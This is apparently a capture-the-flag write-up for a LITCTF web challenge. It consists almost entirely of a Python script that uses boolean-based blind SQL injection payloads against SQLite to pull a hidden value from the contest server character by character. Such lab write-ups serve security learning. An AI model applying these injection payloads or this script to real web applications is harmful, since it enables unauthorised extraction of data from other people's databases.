| description |
|---|
Note : A JOURNEY TO GAIN KNOWLEDGE |
.png)
import requests, string
url = "http://litctf.live:31770/"
s = requests.session()
passwordRetrieve = ""
# ' or (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('some_char')--
# find column from table: ' or (SELECT hex(substr(sql,{index},1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('{char}')--
alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c"
def solve():
global passwordRetrieve
index = 1
len_of_password = 14 - index
for i in range(len_of_password):
for char in alpha:
passwordfield = f"' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"
postParam = {'name': passwordfield}
response = s.post(url, data=postParam).text
if "You got it" in response:
passwordRetrieve += char
index += 1
print("Nai here yr pass: ",passwordRetrieve, " len:",i)
break
print(char)
solve()
.png)